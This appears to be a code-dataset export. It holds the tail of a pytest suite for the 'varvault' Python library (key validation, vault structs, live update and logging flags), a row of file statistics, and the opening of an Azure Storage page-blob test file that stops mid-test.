json.dump({Keyring.key_valid_type_is_str: "valid", Keyring.key_valid_type_is_int: 1, "temp": "this-should-not-be-in-the-vault"}, open(vault_file_new, "w"))
vault = varvault.from_vault(Keyring, "from-vault", vault_file_new, varvault.FileTypes.JSON, varvault.VaultFlags.file_is_read_only())
assert varvault.Key("temp") not in vault, "Vault contains a key that should not be in the vault since if doesn't exist in the keyring"
assert Keyring.key_valid_type_is_str in vault
assert Keyring.key_valid_type_is_int in vault
def test_insert_nonexistent_key(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
temp_key = varvault.Key("temp_key")
try:
vault.insert(temp_key, "this-should-not-go-in")
pytest.fail("Somehow managed to insert a non-existent key into a vault that should not permit this")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
def test_create_from_faulty_vault(self):
this_key_doesnt_exist_in_keyring = varvault.Key("this_key_doesnt_exist_in_keyring", valid_type=str)
try:
vault = varvault.from_vault(Keyring, "from-vault", faulty_existing_vault, varvault.FileTypes.JSON)
pytest.fail("Managed to create a vault from a file that should be faulty")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
try:
vault = varvault.from_vault(Keyring, "from-vault", faulty_vault_key_missmatch, varvault.FileTypes.JSON)
pytest.fail("Managed to create a vault from a file with a key not in keyring, and ignore_keys_not_in_keyring is False")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
vault = varvault.from_vault(Keyring, "from-vault", faulty_vault_key_missmatch, varvault.FileTypes.JSON, varvault.VaultFlags.ignore_keys_not_in_keyring(), varvault_vault_filename_to=vault_file_new)
assert this_key_doesnt_exist_in_keyring not in vault, f"Key {this_key_doesnt_exist_in_keyring} was found in the vault when it shouldn't be"
vault = varvault.from_vault(Keyring, "from-vault", faulty_vault_key_missmatch, varvault.FileTypes.JSON,
varvault_vault_filename_to=vault_file_new,
this_key_doesnt_exist_in_keyring=this_key_doesnt_exist_in_keyring)
assert this_key_doesnt_exist_in_keyring in vault, f"Key {this_key_doesnt_exist_in_keyring} was not found in the vault when it should be added as an extra key"
def test_insert_type_validation(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
try:
vault.insert(Keyring.key_valid_type_is_int, "this-should-not-work")
assert False, "Somehow managed to insert a value for a key that should not work"
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
def test_vault_struct_dict(self):
vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_dict)
def _set():
return VaultStructDict("v1", 1)
_set()
assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_dict), VaultStructDict)
logger.info(vault.get(KeyringVaultStruct.key_vault_struct_dict))
from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_dict), VaultStructDict)
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_dict), "internal_function")
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_dict), "value_1")
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_dict), "value_2")
def test_vault_struct_list(self):
vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_list)
def _set():
return VaultStructList("v1", 1)
_set()
assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_list), VaultStructList)
logger.info(vault.get(KeyringVaultStruct.key_vault_struct_list))
from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_list), VaultStructList)
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_list), "internal_function")
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_list), "value_1")
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_list), "value_2")
def test_vault_struct_string(self):
vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_string)
def _set():
return VaultStructString("string-value", "extra-value-here")
_set()
assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_string), VaultStructString)
logger.info(vault.get(KeyringVaultStruct.key_vault_struct_string))
from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_string), VaultStructString)
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_string), "internal_function")
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_string), "string_value")
def test_vault_struct_float(self):
vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_float)
def _set():
return VaultStructFloat(3.14, "extra-value-here")
_set()
assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_float), VaultStructFloat)
logger.info(vault.get(KeyringVaultStruct.key_vault_struct_float))
from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_float), VaultStructFloat)
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_float), "internal_function")
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_float), "float_value")
def test_vault_struct_int(self):
vault = varvault.create_vault(KeyringVaultStruct, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=KeyringVaultStruct.key_vault_struct_int)
def _set():
return VaultStructInt(1, "extra-value-here")
_set()
assert isinstance(vault.get(KeyringVaultStruct.key_vault_struct_int), VaultStructInt)
logger.info(vault.get(KeyringVaultStruct.key_vault_struct_int))
from_vault = varvault.from_vault(KeyringVaultStruct, "from-vault", vault_file_new, varvault.FileTypes.JSON)
assert isinstance(from_vault.get(KeyringVaultStruct.key_vault_struct_int), VaultStructInt)
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_int), "internal_function")
assert hasattr(from_vault.get(KeyringVaultStruct.key_vault_struct_int), "int_value")
def test_live_update_vault(self):
vault_new = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
vault_from = varvault.from_vault(Keyring, "vault-from", vault_file_new, varvault.FileTypes.JSON, varvault.VaultFlags.live_update(), varvault.VaultFlags.file_is_read_only())
@vault_new.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert Keyring.key_valid_type_is_str not in vault_from, f"{Keyring.key_valid_type_is_str} already in the vault; This should not be the case"
@vault_from.vaulter(input_keys=Keyring.key_valid_type_is_str)
def _get(**kwargs):
v = kwargs.get(Keyring.key_valid_type_is_str)
assert v == "valid", f"Value {v} is not correct; Live-update doesn't work"
_get()
def test_live_update_on_main_vault(self):
vault = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.live_update(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert Keyring.key_valid_type_is_int not in vault, f"{Keyring.key_valid_type_is_int} already in vault; This should not be possible"
vault_data = json.load(open(vault_file_new))
vault_data[Keyring.key_valid_type_is_int] = 1
json.dump(vault_data, open(vault_file_new, "w"), indent=2)
assert Keyring.key_valid_type_is_int not in vault, f"{Keyring.key_valid_type_is_int} already in vault; This should not be possible"
@vault.vaulter(input_keys=Keyring.key_valid_type_is_int)
def _get(**kwargs):
key_valid_type_is_int = kwargs.get(Keyring.key_valid_type_is_int)
assert key_valid_type_is_int == 1
_get()
def test_clean_return_keys(self):
vault_new = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault_new.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert vault_new.get(Keyring.key_valid_type_is_str) == "valid"
@vault_new.vaulter(varvault.VaultFlags.clean_return_keys(), return_keys=Keyring.key_valid_type_is_str)
def _clean():
return
_clean()
assert Keyring.key_valid_type_is_str in vault_new, f"No {Keyring.key_valid_type_is_str} in vault"
assert vault_new.get(Keyring.key_valid_type_is_str) == "", f"Key {Keyring.key_valid_type_is_str} is not an empty string; {vault_new.get(Keyring.key_valid_type_is_str)}"
def test_extra_keys(self):
extra_key1 = varvault.Key("extra_key1", valid_type=dict)
vault_new = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON, extra_key1=varvault.Key("extra_key1", valid_type=dict))
@vault_new.vaulter(return_keys=extra_key1)
def _set_invalid():
return [1, 2, 3]
try:
_set_invalid()
pytest.fail("Unexpectedly managed to set an invalid value to an extra key")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
@vault_new.vaulter(return_keys=extra_key1)
def _set_valid():
return {"a": 1, "b": 2, "c": 3}
_set_valid()
@vault_new.vaulter(varvault.VaultFlags.clean_return_keys(), return_keys=extra_key1)
def _clean():
return
_clean()
assert vault_new.get(extra_key1) == {}
def test_return_tuple_is_single_item(self):
tuple_item = varvault.Key("tuple_item", valid_type=tuple)
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON, tuple_item=tuple_item)
@vault.vaulter(varvault.VaultFlags.return_tuple_is_single_item(), return_keys=tuple_item)
def _set():
return 1, 2, 3
_set()
assert tuple_item in vault, f"Flag: No {tuple_item} found in vault"
assert vault.get(tuple_item) == (1, 2, 3), "Flag: missmatch"
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON, tuple_item=tuple_item)
@vault.vaulter(return_keys=tuple_item)
def _set():
return 1, 2, 3
_set()
assert tuple_item in vault, f"No flag: No {tuple_item} found in vault"
assert vault.get(tuple_item) == (1, 2, 3), "No flag: Missmatch"
def test_split_return_keys(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
vault_secondary = varvault.create_vault(Keyring, "vault-secondary", varvault_vault_filename_to=vault_file_new_secondary, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(varvault.VaultFlags.split_return_keys(), return_keys=Keyring.key_valid_type_is_str)
@vault_secondary.vaulter(varvault.VaultFlags.split_return_keys(), return_keys=Keyring.key_valid_type_is_int)
def _set():
return varvault.MiniVault({Keyring.key_valid_type_is_str: "valid", Keyring.key_valid_type_is_int: 1})
_set()
assert Keyring.key_valid_type_is_str in vault and Keyring.key_valid_type_is_int not in vault
assert Keyring.key_valid_type_is_int in vault_secondary and Keyring.key_valid_type_is_str not in vault_secondary
assert vault.get(Keyring.key_valid_type_is_str) == "valid"
assert vault_secondary.get(Keyring.key_valid_type_is_int) == 1
def test_return_key_can_be_missing(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
def _set_failed():
return "valid"
try:
# Should fail saying that number of returned items do not match the number of keys
_set_failed()
pytest.fail("Managed to set a single variable to two keys or something")
except Exception:
logger.info("Expected error received; test passed")
@vault.vaulter(varvault.VaultFlags.return_key_can_be_missing(), return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
def _set_failed_again():
return "valid"
try:
_set_failed_again()
pytest.fail(f"Managed to set a single variable when {varvault.VaultFlags.return_key_can_be_missing()} is defined; "
f"Should have failed saying return var must be of type {varvault.MiniVault}")
except Exception:
logger.info("Expected error received; test passed")
@vault.vaulter(varvault.VaultFlags.return_key_can_be_missing(), return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
def _set_working():
return varvault.MiniVault({Keyring.key_valid_type_is_str: "valid"})
_set_working()
assert Keyring.key_valid_type_is_str in vault
assert Keyring.key_valid_type_is_int not in vault
assert vault.get(Keyring.key_valid_type_is_str) == "valid"
def test_validate_types_in_minivault_return_values(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
def _set_failed():
return varvault.MiniVault({Keyring.key_valid_type_is_str: 1, Keyring.key_valid_type_is_int: "invalid"})
try:
_set_failed()
pytest.fail("Managed to set invalid values to the vault by returning them in a minivault.")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
def test_validator_decorator(self):
try:
@varvault.validator(function_asserts=True, function_returns_bool=True)
def invalid_decorator_use(value):
pass
pytest.fail("Managed to register a validator function that should not be possible to register. Both 'function_asserts' and 'function_returns_bool' should not be possible to set at the same time")
except SyntaxError as e:
logger.info(f"Expected error received; test passed: {e}")
try:
@varvault.validator()
def invalid_decorator_use(value, this_arg_must_not_exist):
pass
pytest.fail("Managed to register a validator function that should not be possible to register. Managed to register a validator function with more than 1 positional arg called 'keyvalue'")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
try:
@varvault.validator(function_asserts=True)
def invalid_decorator_use(value):
pass
pytest.fail("Managed to register a validator function that should not be possible to register. The function needs to contain a call 'assert' in the source if 'function_asserts' is set to True")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
try:
@varvault.validator(function_returns_bool=True)
def invalid_decorator_use(value) -> bool:
pass
pytest.fail("Managed to register a validator function that should not be possible to register. The function needs to return something in the source if 'function_returns_bool' is set to True")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
@varvault.validator(function_asserts=True, skip_source_assertions=True)
def valid_decorator_use_1(value):
pass
@varvault.validator(function_returns_bool=True, skip_source_assertions=True)
def valid_decorator_use_2(value) -> bool:
pass
def test_key_validation_function(self):
# This will validate the function and assign some attributes to it that varvault will use when validating the value for the key
@varvault.validator(function_returns_bool=True)
def must_be_even(value: int) -> bool:
return (value % 2) == 0
@varvault.validator(function_asserts=True)
def cannot_be_negative(value: int):
assert value >= 0
@varvault.validator()
def no_dashes(value: str):
assert "-" not in value
class KeyringKeyValidationFunction(varvault.Keyring):
int_must_be_even_number = varvault.Key("int_must_be_even_number", valid_type=int, validators=(must_be_even, cannot_be_negative))
no_dashes_in_str = varvault.Key("no_dashes_in_str", valid_type=str, validators=no_dashes)
vault = varvault.create_vault(KeyringKeyValidationFunction, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
try:
vault.insert(KeyringKeyValidationFunction.int_must_be_even_number, 1)
pytest.fail(f"Managed to set {KeyringKeyValidationFunction.int_must_be_even_number} to an uneven number via {vault.insert.__name__}. This should not be possible.")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
@vault.vaulter(return_keys=KeyringKeyValidationFunction.int_must_be_even_number)
def set_failed():
return 5
try:
set_failed()
pytest.fail(f"Managed to set {KeyringKeyValidationFunction.int_must_be_even_number} to an uneven number via {vault.vaulter.__name__}. This should not be possible")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
vault.insert(KeyringKeyValidationFunction.int_must_be_even_number, 2)
assert KeyringKeyValidationFunction.int_must_be_even_number in vault and vault.get(KeyringKeyValidationFunction.int_must_be_even_number) == 2
@vault.vaulter(varvault.VaultFlags.permit_modifications(), return_keys=KeyringKeyValidationFunction.int_must_be_even_number)
def set():
return 4
set()
assert KeyringKeyValidationFunction.int_must_be_even_number in vault and vault.get(KeyringKeyValidationFunction.int_must_be_even_number) == 4
def test_add_minivault_function(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
def insert():
mv = varvault.MiniVault()
mv.add(Keyring.key_valid_type_is_str, "valid")
mv.add(Keyring.key_valid_type_is_int, 1)
return mv
insert()
assert Keyring.key_valid_type_is_str in vault and vault.get(Keyring.key_valid_type_is_str) == "valid"
assert Keyring.key_valid_type_is_int in vault and vault.get(Keyring.key_valid_type_is_int) == 1
class TestLogging:
@classmethod
def setup_class(cls):
tempfile.tempdir = "/tmp" if sys.platform == "darwin" or sys.platform == "linux" else tempfile.gettempdir()
def setup_method(self):
try:
os.remove(vault_file_new)
except:
pass
try:
os.remove(vault_file_new_secondary)
except:
pass
def test_silent(self):
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.silent(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
vault_new.logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
@vault_new.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert len(open(temp_log_file).readlines()) <= 2, f"There appears to be more lines in the log file than what there should be. " \
f"There should only be 2 at most. {varvault.VaultFlags.silent()} appears to not function correctly"
assert len(open(vault_log_file).readlines()) <= 2, f"There appears to be more lines in the log file than what there should be. " \
f"There should only be 2 at most. {varvault.VaultFlags.silent()} appears to not function correctly"
def test_debug(self):
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
# Create and set a file to act as a StreamHandler for the logger object in varvault.
# This way, we can easily capture stdout to a file and assert that the output is the expected
vault_new.logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
@vault_new.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert len(open(temp_log_file).readlines()) >= 10, f"There appears to be fewer lines in the log file than what there should be. " \
f"There should only be 12 at least. {varvault.VaultFlags.debug()} appears to not function correctly"
assert len(open(vault_log_file).readlines()) >= 12, f"There appears to be fewer lines in the log file than what there should be. " \
f"There should only be 12 at least. {varvault.VaultFlags.debug()} appears to not function correctly"
def test_silent_and_debug(self):
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
# Create and set a file to act as a StreamHandler for the logger object in varvault.
# This way, we can easily capture stdout to a file and assert that the output is the expected
vault_new.logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
@vault_new.vaulter(varvault.VaultFlags.silent(), return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert len(open(temp_log_file).readlines()) == 0, f"There appears to be more lines in the log file than what there should be. " \
f"There should be 0 at most. {varvault.VaultFlags.debug()} with {varvault.VaultFlags.silent()} appears to not function correctly"
assert len(open(vault_log_file).readlines()) == 12, f"There appears to be fewer lines in the log file than what there should be. " \
f"There should be 12 at most. {varvault.VaultFlags.debug()} with {varvault.VaultFlags.silent()} appears to not function correctly"
def test_disable_logger(self):
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
try:
os.unlink(vault_log_file)
except OSError:
pass
assert not os.path.exists(vault_log_file), f"{vault_log_file} still exists, weird"
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.disable_logger(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
assert vault_new.logger is None, "logger object is not None; it should be"
assert not os.path.exists(vault_log_file), f"{vault_log_file} exists after creating the vault when saying there shouldn't be a logger object"
@vault_new.vaulter(varvault.VaultFlags.silent(), return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert not os.path.exists(vault_log_file), f"{vault_log_file} exists after using the vault. How?!"
def test_remove_existing_log_file(self):
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault_new.vaulter(varvault.VaultFlags.silent(), return_keys=Keyring.key_valid_type_is_str)
def _doset():
return "valid"
_doset()
with open(vault_log_file) as f1:
assert len(f1.readlines()) == 12, f"There should be exactly 12 lines in the log-file."
vault_from = varvault.from_vault(Keyring, "vault", vault_file_new, varvault.FileTypes.JSON, varvault.VaultFlags.remove_existing_log_file())
assert Keyring.key_valid_type_is_str in vault_from
with open(vault_log_file) as f2:
assert len(f2.readlines()) == 3, f"There should be exactly 3 lines in the logfile. It seems the log-file wasn't removed when the new vault was created from the existing vault."
def test_specific_logger(self):
old_handlers = logger.handlers.copy()
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "pytest-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "pytest-file.log")
try:
os.unlink(temp_log_file)
except OSError:
pass
try:
os.unlink(vault_log_file)
except OSError:
pass
try:
logger.handlers.clear()
logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
logger.addHandler(logging.FileHandler(filename=vault_log_file))
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON, varvault_specific_logger=logger)
assert vault_new.logger.name == "pytest" # The logger used for pytest here is called pytest
@vault_new.vaulter(varvault.VaultFlags.silent(), return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert len(open(temp_log_file).readlines()) == 1, f"There appears to be more lines in the log file than what there should be. There should be 1 at most."
assert len(open(vault_log_file).readlines()) == 11, f"There appears to be fewer lines in the log file than what there should be. There should be 11 at most."
finally:
logger.handlers.clear()
logger.handlers = old_handlers
def test_no_error_logging(self):
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
# Create and set a file to act as a StreamHandler for the logger object in varvault.
# This way, we can easily capture stdout to a file and assert that the output is the expected
vault_new.logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
@vault_new.vaulter(varvault.VaultFlags.no_error_logging(), return_keys=Keyring.key_valid_type_is_str)
def _set():
raise Exception("Failing deliberately")
try:
_set()
except:
pass
assert len(open(temp_log_file).readlines()) == 3, f"There appears to be more lines in the log file than what there should be. " \
f"There should be 3 at most. It appears that {varvault.VaultFlags.no_error_logging()} doesn't work properly"
assert len(open(vault_log_file).readlines()) == 5, f"There appears to be fewer lines in the log file than what there should be. " \
f"There should be 5 at most. It appears that {varvault.VaultFlags.no_error_logging()} doesn't work properly"
| 52.382244 | 220 | 0.705334 | 5,711 | 42,482 | 4.943092 | 0.058659 | 0.042402 | 0.049734 | 0.058023 | 0.814453 | 0.776337 | 0.747184 | 0.713177 | 0.673964 | 0.630747 | 0 | 0.003585 | 0.205475 | 42,482 | 810 | 221 | 52.446914 | 0.832785 | 0.018361 | 0 | 0.487302 | 0 | 0.02381 | 0.197712 | 0.044589 | 0 | 0 | 0 | 0 | 0.168254 | 1 | 0.160317 | false | 0.05873 | 0.011111 | 0.053968 | 0.269841 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
d5ea3fba21f930cb6fc598915de84ceb0121c2d1 | 58,174 | py | Python | tests/blob/test_page_blob.py | Ross1503/azure-storage-python | 345c3d10e42643a0674a760827ba57b6d626efbb | [
"MIT"
] | 348 | 2015-08-18T22:48:21.000Z | 2022-03-28T04:03:29.000Z | tests/blob/test_page_blob.py | Ross1503/azure-storage-python | 345c3d10e42643a0674a760827ba57b6d626efbb | [
"MIT"
] | 558 | 2015-08-19T00:10:36.000Z | 2022-03-17T01:17:08.000Z | tests/blob/test_page_blob.py | Ross1503/azure-storage-python | 345c3d10e42643a0674a760827ba57b6d626efbb | [
"MIT"
] | 285 | 2015-08-17T23:43:34.000Z | 2022-03-27T19:34:29.000Z | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
import unittest
from datetime import datetime, timedelta
from azure.common import AzureHttpError
from azure.storage.blob import BlobPermissions, Blob, PageBlobService, SequenceNumberAction
from azure.storage.blob.models import PremiumPageBlobTier
from azure.storage.common._common_conversion import _get_content_md5
from tests.testcase import (
StorageTestCase,
TestMode,
record,
)
# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'blob'
FILE_PATH = 'blob_input.temp.dat'
LARGE_BLOB_SIZE = 64 * 1024 + 512
EIGHT_TB = 8 * 1024 * 1024 * 1024 * 1024
SOURCE_BLOB_SIZE = 8 * 1024
# ------------------------------------------------------------------------------s
class StoragePageBlobTest(StorageTestCase):
def setUp(self):
super(StoragePageBlobTest, self).setUp()
self.bs = self._create_storage_service(PageBlobService, self.settings)
self.container_name = self.get_resource_name('utcontainer')
# create source blob to be copied from
self.source_blob_name = self.get_resource_name('srcblob')
self.source_blob_data = self.get_random_bytes(SOURCE_BLOB_SIZE)
if not self.is_playback():
self.bs.create_container(self.container_name)
self.bs.create_blob(self.container_name, self.source_blob_name, SOURCE_BLOB_SIZE)
self.bs.create_blob_from_bytes(self.container_name, self.source_blob_name, self.source_blob_data)
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
self.bs.MAX_PAGE_SIZE = 4 * 1024
# generate a SAS so that it is accessible with a URL
sas_token = self.bs.generate_blob_shared_access_signature(
self.container_name,
self.source_blob_name,
permission=BlobPermissions.READ,
expiry=datetime.utcnow() + timedelta(hours=1),
)
self.source_blob_url = self.bs.make_blob_url(self.container_name, self.source_blob_name, sas_token=sas_token)
def tearDown(self):
if not self.is_playback():
try:
self.bs.delete_container(self.container_name)
except:
pass
if os.path.isfile(FILE_PATH):
try:
os.remove(FILE_PATH)
except:
pass
return super(StoragePageBlobTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name(TEST_BLOB_PREFIX)
def _create_blob(self, length=512):
blob_name = self._get_blob_reference()
self.bs.create_blob(self.container_name, blob_name, length)
return blob_name
def assertBlobEqual(self, container_name, blob_name, expected_data):
actual_data = self.bs.get_blob_to_bytes(container_name, blob_name)
self.assertEqual(actual_data.content, expected_data)
def assertRangeEqual(self, container_name, blob_name, expected_data, start_range, end_range):
actual_data = self.bs.get_blob_to_bytes(container_name, blob_name, None, start_range, end_range)
self.assertEqual(actual_data.content, expected_data)
def _wait_for_async_copy(self, container_name, blob_name):
count = 0
blob = self.bs.get_blob_properties(container_name, blob_name)
while blob.properties.copy.status != 'success':
count = count + 1
if count > 5:
self.assertTrue(
False, 'Timed out waiting for async copy to complete.')
self.sleep(5)
blob = self.bs.get_blob_properties(container_name, blob_name)
self.assertEqual(blob.properties.copy.status, 'success')
class NonSeekableFile(object):
def __init__(self, wrapped_file):
self.wrapped_file = wrapped_file
def write(self, data):
self.wrapped_file.write(data)
def read(self, count):
return self.wrapped_file.read(count)
# --Test cases for page blobs --------------------------------------------
@record
def test_create_blob(self):
# Arrange
blob_name = self._get_blob_reference()
# Act
resp = self.bs.create_blob(self.container_name, blob_name, 1024)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertTrue(self.bs.exists(self.container_name, blob_name))
@record
def test_create_blob_with_metadata(self):
# Arrange
blob_name = self._get_blob_reference()
metadata = {'hello': 'world', 'number': '42'}
# Act
resp = self.bs.create_blob(self.container_name, blob_name, 512, metadata=metadata)
# Assert
md = self.bs.get_blob_metadata(self.container_name, blob_name)
self.assertDictEqual(md, metadata)
@record
def test_put_page_with_lease_id(self):
# Arrange
blob_name = self._create_blob()
lease_id = self.bs.acquire_blob_lease(self.container_name, blob_name)
# Act
data = self.get_random_bytes(512)
self.bs.update_page(self.container_name, blob_name, data, 0, 511, lease_id=lease_id)
# Assert
blob = self.bs.get_blob_to_bytes(self.container_name, blob_name, lease_id=lease_id)
self.assertEqual(blob.content, data)
@record
def test_update_page(self):
# Arrange
blob_name = self._create_blob()
# Act
data = self.get_random_bytes(512)
resp = self.bs.update_page(self.container_name, blob_name, data, 0, 511)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
